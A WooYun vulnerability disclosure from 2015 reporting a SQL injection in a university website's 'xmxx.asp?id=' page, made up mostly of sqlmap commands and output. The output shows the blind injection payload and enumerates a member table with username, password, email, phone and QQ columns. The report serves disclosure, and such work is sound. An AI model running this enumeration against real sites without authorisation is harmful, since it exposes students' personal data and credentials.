当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0145551

漏洞标题:东北农业大学注入点一枚,包含全校用户资料

相关厂商:CCERT教育网应急响应组

漏洞作者: 面具

提交时间:2015-10-11 20:05

修复时间:2015-10-16 20:06

公开时间:2015-10-16 20:06

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:8

漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-11: 细节已通知厂商并且等待厂商处理中
2015-10-16: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

注入点一枚,包含QQ 邮箱等

详细说明:

http://**.**.**.**/xmxx.asp?id=193
[root@Hacker~]# Sqlmap -u "http://**.**.**.**/xmxx.asp?id=193" --tables
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://**.**.**.**
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 14:23:52
[14:23:52] [INFO] resuming back-end DBMS 'microsoft access'
[14:23:52] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=193 AND 6444=6444
---
[14:23:52] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
[14:23:52] [INFO] fetching tables for database: 'Microsoft_Access_masterdb'
[14:23:52] [INFO] fetching number of tables for database 'Microsoft_Access_maste
rdb'
[14:23:52] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[14:23:52] [INFO] retrieved:
[14:23:52] [INFO] heuristics detected web page charset 'GB2312'
[14:23:52] [WARNING] in case of continuous data retrieval problems you are advis
ed to try a switch '--no-cast' and/or switch '--hex'
[14:23:52] [WARNING] unable to retrieve the number of tables for database 'Micro
soft_Access_masterdb'
[14:23:53] [ERROR] cannot retrieve table names, back-end DBMS is Access
Database: Microsoft_Access_masterdb
[2 tables]
+----------+
| member |
| userinfo |
+----------+
[14:23:53] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error) - 3 times
[14:23:53] [WARNING] cannot properly display Unicode characters inside Windows O
S command prompt (http://**.**.**.**/issue1602). All unhandled occurances wi
ll result in replacement with '?' character. Please, find proper character repre
sentation inside corresponding output files.
[14:23:53] [INFO] fetched data logged to text files under 'E:\??2\??\sqlmap\sqlm
ap\Bin\output\**.**.**.**'

111111.png


[root@Hacker~]# Sqlmap -u "http://**.**.**.**/xmxx.asp?id=193" --columns -T
member
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://**.**.**.**
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 14:10:07
[14:10:07] [INFO] resuming back-end DBMS 'microsoft access'
[14:10:07] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=193 AND 6444=6444
---
[14:10:07] [INFO] the back-end DBMS is Microsoft Access
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
[14:10:07] [ERROR] cannot retrieve column names, back-end DBMS is Access
do you want to use common column existence check? [Y/n/q] Y
[14:10:10] [INFO] heuristics detected web page charset 'GB2312'
[14:10:10] [WARNING] in case of continuous data retrieval problems you are advis
ed to try a switch '--no-cast' and/or switch '--hex'
[14:10:10] [WARNING] cannot properly display Unicode characters inside Windows O
S command prompt (http://**.**.**.**/issue1602). All unhandled occurances wi
ll result in replacement with '?' character. Please, find proper character repre
sentation inside corresponding output files.
[14:10:10] [INFO] checking column existence using items from 'E:\??2\??\sqlmap\s
qlmap\Bin\txt\common-columns.txt'
[14:10:10] [INFO] adding words used on web page to the check list
please enter number of threads? [Enter for 1 (current)] 1
[14:10:12] [WARNING] running in a single-thread mode. This could take a while.
[14:10:13] [INFO] retrieved: id
[14:10:14] [INFO] retrieved: username
[14:10:16] [INFO] retrieved: email
[14:10:29] [INFO] retrieved: address
[14:10:42] [INFO] retrieved: password
[14:11:58] [INFO] retrieved: phone
[14:12:16] [INFO] retrieved: msn
[14:12:18] [INFO] retrieved: qq
[14:14:00] [INFO] retrieved: age
Database: Microsoft_Access_masterdb
Table: member
[9 columns]
+----------+-------------+
| Column | Type |
+----------+-------------+
| address | numeric |
| age | non-numeric |
| email | non-numeric |
| id | numeric |
| msn | non-numeric |
| password | non-numeric |
| phone | numeric |
| qq | numeric |
| username | non-numeric |
+----------+-------------+
[14:16:52] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error) - 2450 times
[14:16:52] [INFO] fetched data logged to text files under 'E:\??2\??\sqlmap\sqlm
ap\Bin\output\**.**.**.**'

555555.png


漏洞证明:

555555.png

修复方案:

版权声明:转载请注明来源 面具@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-10-16 20:06

厂商回复:

最新状态:

暂无